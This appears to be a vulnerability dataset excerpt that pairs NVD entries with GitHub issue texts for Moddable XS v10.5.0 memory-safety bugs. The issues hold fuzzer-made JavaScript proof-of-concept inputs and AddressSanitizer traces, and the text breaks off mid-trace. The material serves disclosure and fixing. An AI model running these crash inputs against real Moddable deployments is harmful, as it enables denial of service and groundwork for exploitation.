"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Moddable-OpenSource/moddable/issues/580"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Moddable-OpenSource/moddable/issues/580"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:moddable:moddable:10.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A84B5640-6948-4ABD-A530-54E4DF5EAA56",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/Moddable-OpenSource/moddable/issues/580 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Moddable-OpenSource",
"moddable"
] | # Enviroment
```
operating system: ubuntu18.04
compile command: cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc
```
# poc:
```
function gc() {
for (let i = 0; i < 500; i++) {
let ab = new ArrayBuffer(1518500249 | 1073741823);
}
}
function opt(obj) {
for (let i = 0; yjwa; i++) {
}
let tmp = { a: 1 };
gc();
tmp.__proto__ = {};
var hedB = escape(null);
for (let k in tmp) {
tmp.__proto__ = {};
gc();
obj.__proto__ = {};
var yjwa = i < 500;
return obj[k];
}
}
opt({});
var CPzS = fake_object_memory[0];
let fake_object_memory = new Uint32Array(100);
fake_object_memory[0] = 4660;
let fake_object = opt(fake_object_memory);
opt(9007199254740990);
print(fake_object);
```
# description
```
=================================================================
==5914==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f603a9fe820 at pc 0x7f603de4ebec bp 0x7ffc75e18740 sp 0x7ffc75e17ee8
WRITE of size 2147483647 at 0x7f603a9fe820 thread T0
#0 0x7f603de4ebeb in __asan_memset (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8cbeb)
#1 0x49c99e in fx_ArrayBuffer /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDataView.c:431
#2 0x5bcb2b in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:824
#3 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
#4 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
#5 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
#6 0x7f603d4f282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#7 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)
0x7f603a9fe820 is located 0 bytes to the right of 16777248-byte region [0x7f60399fe800,0x7f603a9fe820)
allocated by thread T0 here:
#0 0x7f603de5a602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x579189 in fxAllocateChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsPlatforms.c:122
#2 0x53cd2b in fxGrowChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:377
#3 0x53b7fe in fxAllocate /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:159
#4 0x42095a in fxCreateMachine /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1305
#5 0x6ec9a0 in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:249
#6 0x7f603d4f282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memset
Shadow bytes around the buggy address:
0x0fec87537cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fec87537cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fec87537cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fec87537ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fec87537cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fec87537d00: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
0x0fec87537d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fec87537d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fec87537d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fec87537d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fec87537d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==5914==ABORTING
``` | heap-buffer-overflow(fx_ArrayBuffer) | https://api.github.com/repos/Moddable-OpenSource/moddable/issues/580/comments | 0 | 2021-02-26T10:30:01Z | 2021-03-23T22:52:56Z | https://github.com/Moddable-OpenSource/moddable/issues/580 | 817,236,265 | 580 | 2,797 |
CVE-2021-29328 | 2021-11-19T17:15:08.247 | OpenSource Moddable v10.5.0 was discovered to contain buffer over-read in the fxDebugThrow function at /moddable/xs/sources/xsDebug.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Moddable-OpenSource/moddable/issues/585"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Moddable-OpenSource/moddable/issues/585"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:moddable:moddable:10.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A84B5640-6948-4ABD-A530-54E4DF5EAA56",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"125"
] | 125 | https://github.com/Moddable-OpenSource/moddable/issues/585 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"Moddable-OpenSource",
"moddable"
] | # Enviroment
```
operating system: ubuntu18.04
compile command: cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc
```
# poc:
```
function getHiddenValue() {
var obj = {};
var nEmw = new RegExp(null);
var oob = 'value';
var fun = eval(str);
nEmw = new Object();
oob = Object.assign('0', Object(521));
var str = 'new String(\'\')';
var fun = eval(str);
let protoWithIndexedAccessors = {};
var j = [];
Object.assign(obj, fun);
var fun = eval(str);
return obj;
}
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = 'constructor';
var extern_arr_vars = [];
let i = 0;
var ijjkkk = 0;
str = ijjkkk < 100000;
function helper(i) {
let a = new Array();
var extern_arr_vars = [];
if (ijjkkk < 100000) {
makeOobString(a, protoWithIndexedAccessors);
}
return a;
var oobString = makeOobString();
}
var j = [];
var fun = eval(str);
Object(fun, hiddenValue);
var oobString = helper();
for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
fun = makeOobString();
}
return oobString;
}
var oobString = makeOobString();
var oobString = makeOobString();
helper(oobString);
let protoWithIndexedAccessors = {};
```
# description
```
ASAN:SIGSEGV
=================================================================
==5974==ERROR: AddressSanitizer: SEGV on unknown address 0x7f3b90c5ec8a (pc 0x0000004cbf37 bp 0x7ffe0703b1f0 sp 0x7ffe0703b1c0 T0)
#0 0x4cbf36 in fxDebugThrow /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784
#1 0x42068e in fxThrowMessage /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1251
#2 0x655dea in fxEnvironmentGetProperty /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsType.c:1147
#3 0x5d5e64 in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:2133
#4 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
#5 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
#6 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
#7 0x7f4b855bd82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#8 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsDebug.c:784 fxDebugThrow
==5974==ABORTING
``` | over access(fxEnvironmentGetProperty) | https://api.github.com/repos/Moddable-OpenSource/moddable/issues/585/comments | 0 | 2021-02-26T10:32:47Z | 2021-03-23T22:52:57Z | https://github.com/Moddable-OpenSource/moddable/issues/585 | 817,238,338 | 585 | 2,798 |
CVE-2021-29329 | 2021-11-19T17:15:08.293 | OpenSource Moddable v10.5.0 was discovered to contain a stack overflow in the fxBinaryExpressionNodeDistribute function at /moddable/xs/sources/xsTree.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Moddable-OpenSource/moddable/issues/587"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Moddable-OpenSource/moddable/issues/587"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:moddable:moddable:10.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A84B5640-6948-4ABD-A530-54E4DF5EAA56",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"770"
] | 770 | https://github.com/Moddable-OpenSource/moddable/issues/587 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"Moddable-OpenSource",
"moddable"
] | # Enviroment
```
operating system: ubuntu18.04
compile command: cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc
```
# poc:
```
function getHiddenValue() {
var obj = {};
var oob = '/re/';
oob = oob.replace('', '-0'.repeat(1048576));
var str = '(new Number(-0))' + oob + '(new Boolean(false))';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = '-Infinity';
var fun = eval(str);
Object.assign(fun, hiddenValue);
var oobString = fun.toString();
return oobString;
}
var oobString = makeOobString();
```
# description
```
ASAN:SIGSEGV
=================================================================
==6025==ERROR: AddressSanitizer: stack-overflow on address 0x7fff6d476ff8 (pc 0x000000646053 bp 0x7fff6d477020 sp 0x7fff6d476ff0 T0)
#0 0x646052 in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:265
#1 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#2 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#3 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#4 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#5 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#6 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#7 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#8 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#9 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#10 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#11 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#12 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#13 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#14 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#15 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#16 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#17 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#18 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#19 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#20 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#21 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#22 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#23 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#24 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#25 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#26 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#27 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#28 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#29 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#30 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#31 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#32 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#33 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#34 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#35 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#36 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#37 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#38 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#39 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#40 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#41 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#42 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#43 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#44 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#45 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#46 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#47 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#48 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#49 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#50 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#51 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#52 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#53 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#54 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#55 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#56 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#57 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#58 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#59 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#60 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#61 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#62 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#63 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#64 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#65 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#66 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#67 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#68 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#69 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#70 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#71 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#72 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#73 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#74 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#75 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#76 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#77 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#78 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#79 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#80 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#81 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#82 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#83 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#84 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#85 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#86 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#87 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#88 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#89 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#90 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#91 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#92 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#93 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#94 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#95 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#96 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#97 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#98 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#99 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#100 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#101 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#102 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#103 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#104 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#105 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#106 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#107 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#108 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#109 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#110 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#111 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#112 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#113 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#114 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#115 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#116 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#117 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#118 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#119 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#120 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#121 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#122 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#123 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#124 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
#125 0x607c21 in fxNodeDispatchHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:361
#126 0x64609b in fxBinaryExpressionNodeDistribute /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsTree.c:267
#127 0x607b7f in fxNodeHoist /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScope.c:355
